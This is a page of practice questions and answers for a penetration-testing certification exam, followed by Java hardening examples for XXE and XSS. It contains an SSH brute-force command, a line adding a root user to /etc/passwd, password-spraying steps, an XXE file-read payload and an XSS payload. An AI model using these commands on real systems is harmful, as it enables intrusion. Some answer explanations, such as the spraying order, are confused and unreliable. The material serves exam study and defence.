Practice Free PT0-003 Exam Online Questions
A company’s incident response team determines that a breach occurred because a penetration tester left a web shell.
Which of the following should the penetration tester have done after the engagement?
- A . Enable a host-based firewall on the machine
- B . Remove utilized persistence mechanisms on client systems
- C . Revert configuration changes made during the engagement
- D . Turn off command-and-control infrastructure
B
Explanation:
The immediate and mandatory post-engagement action after completing an authorized penetration test is to remove any accounts, implants, backdoors, web shells, scheduled tasks, or other persistence mechanisms that were created or used during the test. Leaving persistence (a web shell in this case) is exactly what caused the breach and is an unacceptable post-test lapse.
Why B is correct:
Persistence mechanisms provide continued unauthorized access and are a direct security risk if not removed. Removing them returns the environment to its pre-test security posture and prevents later compromise by third parties.
Removal of persistence is a standard requirement in rules of engagement and in post-test cleanup checklists.
Why the other answers are incomplete or secondary:
A penetration tester gains access to a host but does not have access to any type of shell.
Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?
- A . ProxyChains
- B . Netcat
- C . PowerShell ISE
- D . Process IDs
B
Explanation:
If a penetration tester gains access to a host but does not have a shell, the best tool for further enumeration is Netcat.
Here’s why:
Netcat:
Versatility: Netcat is known as the "Swiss Army knife" of networking tools. It can be used for port scanning, banner grabbing, and setting up reverse shells.
Enumeration: Without a shell, Netcat can help enumerate open ports and services running on the host, providing insight into the host’s environment.
Comparison with Other Tools:
ProxyChains: Used to chain proxies together, not directly useful for enumeration without an initial shell.
PowerShell ISE: Requires a shell to execute commands and scripts.
Process IDs: Without a shell, enumerating process IDs directly isn’t possible.
Netcat’s ability to perform multiple network-related tasks without needing a shell makes it the best choice for further enumeration.
A previous penetration test report identified a host with vulnerabilities that was successfully exploited. Management has requested that an internal member of the security team reassess the host to determine if the vulnerability still exists.

Part 1:
- Analyze the output and select the command to exploit the vulnerable service.
Part 2:
- Analyze the output from each command.
- Select the appropriate set of commands to escalate privileges.
- Identify which remediation steps should be taken.

hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
The appropriate set of commands to escalate privileges is:
echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
The remediations that should be taken after the successful privilege escalation are:
Remove the SUID bit from cp.
Make backup script not world-writable.
Comprehensive Step-by-Step Explanation of the Simulation
Part 1: Exploiting Vulnerable Service
Nmap Scan Analysis
Command: nmap -sC -T4 192.168.10.2
Purpose: This command runs a default script scan with timing template 4 (aggressive).
Output:
Port State Service
22/tcp open ssh
23/tcp closed telnet
80/tcp open http
111/tcp closed rpcbind
445/tcp open samba
3389/tcp closed rdp
Ports open are SSH (22), HTTP (80), and Samba (445).
Enumerating Samba Shares
Command: enum4linux -S 192.168.10.2
Purpose: To enumerate Samba shares and users.
Output:
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x42]
user:[syslog] rid:[0x4ba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[lowpriv] rid:[0x3fa]
We identify a user lowpriv.
Selecting Exploit Command
Hydra Command: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
Purpose: To perform a brute force attack on SSH using the lowpriv user and a list of the 500 worst passwords.
-l lowpriv: Specifies the username.
-P 500-worst-passwords.txt: Specifies the password list.
-t 4: Uses 4 tasks/threads for the attack.
ssh://192.168.10.2:22: Specifies the SSH service and port.
Executing the Hydra Command
Result: Successful login as lowpriv user if a match is found.
Part 2: Privilege Escalation and Remediation
Finding SUID Binaries and Configuration Files
Command: find / -perm -2 -type f 2>/dev/null | xargs ls -l
Purpose: To find world-writable files.
Command: find / -perm -u=s -type f 2>/dev/null | xargs ls -l
Purpose: To find files with SUID permission.
Command: grep "/bin/bash" /etc/passwd | cut -d':' -f1-4,6,7
Purpose: To identify users with bash shell access.
Selecting Privilege Escalation Command
Command: echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
Purpose: To create a new root user entry in the passwd file.
root2: Username.
5ZOYXRFHVZ7OY: Password hash.
::0:0: User and group ID (root).
/root: Home directory.
/bin/bash: Default shell.
Executing the Privilege Escalation Command
Result: Creation of a new root user root2 with a specified password.
Remediation Steps Post-Exploitation
Remove SUID Bit from cp:
Command: chmod u-s /bin/cp
Purpose: Removing the SUID bit from cp to prevent misuse.
Make Backup Script Not World-Writable:
Command: chmod o-w /path/to/backup/script
Purpose: Ensuring backup script is not writable by all users to prevent unauthorized modifications.
Execution and Verification
Verifying Hydra Attack:
Run the Hydra command and monitor for successful login attempts.
Verifying Privilege Escalation:
After appending the new root user to the passwd file, attempt to switch user to root2 and check root privileges.
Implementing Remediation:
Apply the remediation commands to secure the system and verify the changes have been implemented.
By following these detailed steps, one can replicate the simulation and ensure a thorough understanding of both the exploitation and the necessary remediations.
A penetration tester gained a foothold within a network. The penetration tester needs to enumerate all users within the domain.
Which of the following is the best way to accomplish this task?
- A . pwd.exe
- B . net.exe
- C . sc.exe
- D . msconfig.exe
B
Explanation:
net.exe is the classic Windows networking utility that includes commands for enumerating domain resources and accounts from a compromised host where the tester has any authenticated domain context. Typical commands used by penetration testers to enumerate domain users with net.exe include:
net user /domain ― lists domain user accounts (name and some properties).
net group "Domain Users" /domain ― lists members of the Domain Users group.
net view /domain ― lists computers in the domain (useful to find targets for further enumeration).
Why net.exe is the best option here:
It is installed by default on Windows systems and works with the current authenticated domain credentials (common after gaining a foothold).
It provides a quick, low-noise way to enumerate user accounts and groups without requiring additional tooling or elevated privileges beyond an authenticated domain user.
Results can be scripted and parsed for further enumeration and pivoting.
Why the other options are not appropriate:
During a red-team exercise, a penetration tester obtains an employee’s access badge. The tester uses the badge’s information to create a duplicate for unauthorized entry.
Which of the following best describes this action?
- A . Smurfing
- B . Credential stuffing
- C . RFID cloning
- D . Card skimming
C
Explanation:
RFID Cloning:
RFID (Radio-Frequency Identification) cloning involves copying the data from an access badge and creating a duplicate that can be used for unauthorized entry.
Tools like Proxmark or RFID duplicators are commonly used for this purpose.
Why Not Other Options?
A (Smurfing): A network-based denial-of-service attack, unrelated to physical access.
B (Credential stuffing): Involves using stolen credentials in bulk for authentication attempts, unrelated to badge cloning.
D (Card skimming): Relates to stealing credit card information, not access badges.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user.
Which of the following techniques would most likely be used for that purpose?
- A . Privilege escalation
- B . DOM injection
- C . Session hijacking
- D . Cross-site scripting
D
Explanation:
Cross-site scripting (XSS) is a client-side attack where an attacker injects malicious scripts into a web page viewed by other users. When executed in a browser, it can steal session cookies, perform unauthorized transactions, or execute malicious actions on behalf of the victim.
Option D (Cross-site scripting) is correct because XSS can manipulate client-side input validation to execute unauthorized transactions.
Option A (Privilege escalation) is incorrect because it involves gaining higher privileges on a system, not attacking input validation in a web application.
Option B (DOM injection) is incorrect because DOM-based attacks manipulate browser-side JavaScript but are not necessarily used for unauthorized transactions.
Option C (Session hijacking) is incorrect because session hijacking requires capturing a valid user session, whereas XSS can steal session tokens for this purpose.
Reference: CompTIA PenTest+ PT0-003 Official Guide, Chapter 6 (Web Application Attacks).
A penetration tester is preparing a password-spraying attack against a known list of users for the company "example".
The tester is using the following list of commands:
1. pw-inspector -i sailwords -t 8 -S pass
2. spray365.py spray -ep plan
3. users="~/user.txt"; allwords="~/words.txt"; pass="~/passwords.txt"; plan="~/spray.plan"
4. spray365.py generate --password-file $pass --userfile $user --domain "example.com" --execution-plan $plan
5. cew -m 5 "http://www.example.com" -w sailwords
Which of the following is the correct order for the list of the commands?
- A . 3,4,1,2,5
- B . 3,1,2,5,4
- C . 2,3,1,4,5
- D . 3,5,1,4,2
A
Explanation:
Let’s break it down in order:
Step 3: Sets environment variables (paths to user list, password list, etc.).
Step 4: Generates the execution plan using spray365.py generate with the variables set in step 3.
Step 1: Filters the password list using pw-inspector to enforce a minimum password policy.
Step 2: Executes the password spraying using the generated plan.
Step 5: Optionally verifies availability or reachability using cew (custom enumeration wrapper).
The correct logical order of operations matches option A.
CompTIA PenTest+
Reference: PT0-003 Objective 2.3: Perform password attacks.
Kali tools & scripts usage and scripting logic are core elements in PenTest+ methodology.
Which of the following is a reason to use a template when creating a penetration testing report?
- A . To articulate risks accurately
- B . To enhance the testing approach
- C . To contextualize collected data
- D . To standardize needed information
- E . To improve testing time
D
Explanation:
A template ensures consistency across reports by defining the required sections (scope, methodology, findings, risk ratings, remediation, evidence, executive summary, and appendices). Standardization helps reviewers and clients quickly find required information, supports quality assurance, and ensures compliance with contractual/reporting requirements. While templates also help articulate risks and contextualize data (A and C) and may indirectly save time (E), their primary purpose is to standardize needed information so every engagement includes the same baseline content and structure.
CompTIA PT0-003 Mapping:
Domain 5.0 Reporting and Communication ― produce consistent, repeatable reports and use templates to ensure completeness and QA.
A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY foo SYSTEM "file:///etc/passwd" >
]>
<test>&foo;</test>
Which of the following should the tester recommend in the report to best prevent this type of vulnerability?
- A . Drop all excessive file permissions with chmod o-rwx.
- B . Ensure the requests application access logs are reviewed frequently.
- C . Disable the use of external entities.
- D . Implement a WAF to filter all incoming requests.
C
Explanation:
The vulnerability in question is XML External Entity (XXE) injection, which occurs when an application processes XML input containing external entities that access files on the server or external resources.
Disabling External Entities:
The root cause of the issue is the application’s ability to process external entities (<!ENTITY foo SYSTEM …>). Disabling external entities entirely prevents XXE attacks.
This can be achieved by configuring the XML parser securely (e.g., in Java, DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true), which rejects any DOCTYPE declaration and therefore any entity definition before it can be resolved).
Why Not Other Options?
A (chmod o-rwx): File permission hardening may reduce the impact of a successful attack but does not mitigate XXE at the parser level.
B (Review logs): Reviewing logs is a reactive measure, not a prevention mechanism.
D (WAF): A WAF may block some malicious requests but is not a reliable mitigation for XXE vulnerabilities embedded in legitimate XML input.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
OWASP XXE Prevention Cheat Sheet
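The parser hardening recommended above, as an added Java example that is not part of the original question set: it feeds the question's payload to a default DocumentBuilderFactory and to one with the disallow-doctype-decl feature set, and reports what each does. Class and method names are my own.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class XxeHardening {
    // The payload from the question, embedded as a constructed test input.
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE data [\n"
      + "<!ENTITY foo SYSTEM \"file:///etc/passwd\" >\n"
      + "]>\n"
      + "<test>&foo;</test>";

    // Hardened factory: reject any DOCTYPE (the feature named in the explanation)
    // and switch off external entities and DTD loading as defence in depth.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Parses the payload with the given factory. A default factory resolves the
    // SYSTEM entity and the file contents become the text of <test>; the hardened
    // factory fails at the DOCTYPE with a SAXParseException before any I/O happens.
    static String tryParse(DocumentBuilderFactory f) throws Exception {
        DocumentBuilder db = f.newDocumentBuilder();
        try {
            Document doc = db.parse(new InputSource(new StringReader(PAYLOAD)));
            int len = doc.getDocumentElement().getTextContent().length();
            return "parsed; <test> holds " + len + " chars of entity content";
        } catch (Exception e) {
            return "failed (" + e.getClass().getSimpleName() + "): " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // Default settings: vulnerable configuration, shown only for comparison.
        System.out.println("default : " + tryParse(DocumentBuilderFactory.newInstance()));
        System.out.println("hardened: " + tryParse(hardenedFactory()));
    }
}
```

Run on a host where /etc/passwd exists, the first line reports a non-zero character count; the second reports the DOCTYPE rejection regardless of the file.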
During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:
7/<sCRitP>aLeRt('pwned')</ScriPt>
Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?
- A . Arbitrary code execution: the affected computer should be placed on a perimeter network
- B . SQL injection attack: should be detected and prevented by a web application firewall
- C . Cross-site request forgery: should be detected and prevented by a firewall
- D . XSS obfuscated: should be prevented by input sanitization
D
Explanation:
XSS Attack
The payload exploits Cross-Site Scripting (XSS) by injecting obfuscated JavaScript into the application.
When rendered, the browser executes the malicious code (e.g., alert('pwned')).
Obfuscation (<sCRitP> instead of <script>) attempts to bypass naive input filters.
Countermeasure:
Implement input sanitization to ensure all user inputs are properly validated and escaped before being processed or rendered.
Other measures include using Content Security Policies (CSP) and output encoding.
Why Not Other Options?
A: This is not arbitrary code execution; it is a browser-based attack.
B: XSS is unrelated to SQL injection.
C: Cross-Site Request Forgery (CSRF) is a different vulnerability targeting session handling, not script injection.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
OWASP XSS Prevention Cheat Sheet
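The countermeasure described above, as an added Java example that is not part of the original question set: it shows why a naive case-sensitive blocklist misses the mixed-case payload, and applies HTML output encoding (the OWASP cheat sheet rule for an HTML body context) so the payload is rendered as text. Class and method names are my own.

```java
public class XssOutputEncoding {
    // The payload from the report, embedded as a constructed input string.
    static final String PAYLOAD = "7/<sCRitP>aLeRt('pwned')</ScriPt>";

    // Naive blocklist filter: rejects input only if it contains the exact lowercase tag.
    // The mixed-case tags in the payload slip straight through.
    static boolean naiveFilterBlocks(String input) {
        return input.contains("<script>");
    }

    // Output encoding for an HTML text context: every character with HTML meaning is
    // replaced by an entity, so the browser never parses a tag, whatever its casing.
    static String encodeForHtml(String input) {
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // True if a raw tag delimiter survives, i.e. the browser could still see markup.
    static boolean containsRawTag(String html) {
        return html.indexOf('<') >= 0 || html.indexOf('>') >= 0;
    }

    public static void main(String[] args) {
        System.out.println("naive filter blocks payload? " + naiveFilterBlocks(PAYLOAD));
        String safe = encodeForHtml(PAYLOAD);
        System.out.println("encoded for HTML body      : " + safe);
        System.out.println("raw tag left after encoding? " + containsRawTag(safe));
    }
}
```

Encoding is context-specific: the table above is for text inside an element body, and attribute, JavaScript and URL contexts each need their own encoder.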
